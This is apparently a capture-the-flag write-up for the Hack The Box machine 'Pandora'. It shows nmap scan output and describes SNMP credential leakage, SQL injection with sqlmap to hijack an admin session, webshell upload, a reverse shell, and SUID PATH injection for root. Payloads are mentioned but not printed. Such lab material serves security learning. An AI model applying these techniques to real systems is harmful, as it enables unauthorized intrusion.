Pandora
Nmap Scan
$ nmap -sC -sV -Pn -oN nmap 10.10.11.136
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-16 16:31 +08
Nmap scan report for 10.10.11.136
Host is up (0.040s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 24:c2:95:a5:c3:0b:3f:f3:17:3c:68:d7:af:2b:53:38 (RSA)
| 256 b1:41:77:99:46:9a:6c:5d:d2:98:2f:c0:32:9a:ce:03 (ECDSA)
|_ 256 e7:36:43:3b:a9:47:8a:19:01:58:b2:bc:89:f6:51:08 (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Play | Landing
|_http-server-header: Apache/2.4.41 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.21 seconds$ sudo nmap -sU -sV -Pn -oN udp-nmap 10.10.11.136
[sudo] password for ranay:
Nmap scan report for panda.htb (10.10.11.136)
Host is up (0.042s latency).
Not shown: 999 closed udp ports (port-unreach)
PORT STATE SERVICE VERSION
161/udp open snmp SNMPv1 server; net-snmp SNMPv3 server (public)
Service Info: Host: pandora
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 1013.53 secondsInitial Access
TCP Port 80
There is a website running on port 80.
Upon further inspection, the website does not have anything that is very suspicious.
Even after trying to brute force the directory and virtual host give us no results or anything interesting to take a look.
UDP Port 161
The first thing to try is to get the community string through brute-force.
So the community string is public. By using this string, we can try to see if there is any information that can be leaked out.
There is some information that is leaked by using braa.
However, the password is not mississippi.
After further enumeration with snmpbulkwalk, we can see the password for daniel in plaintext.
After trying the password, we are able to login into ssh using daniel account.
Getting User
Through linpeas.sh, there is a VirtualHost at localhost:80.
SQLi Vulnerability
However, it does not return a shell so we still need to use the SQLi method. After running sqlmap, we can see the the database name is pandora .
Further enumeration using sqlmap will return us all the tables in the database but there is 1 table that stood out which is tsessions_php.
Even further enumeration, we can see that this table contains all the session for the user account of admin.
After adding the session to the web brower, we are able to log into the FMS. So the next step is to upload a webshell into the FMS.
After that, we can just call the reverse shell using the payload as shown in the image below.
This will return us a shell as the user matt.
Privilege Escalation
However, given that shell we are not able to do much so we will drop our own public key into the user and log in using ssh.
Exploiting SUID binary for PATH variable injection
After doing some enumeration about which files that have the SUID bits enable, we realised that pandora_backup is one of them. During the execution of the binary, we can also see that the binary is using tar.
So we can just exploit the PATH and inject a malicious binary called tar
Ensures that the tar binary is an executable.
After which after running the binary again, we are able to obtain the root shell and get the flag.
Last updated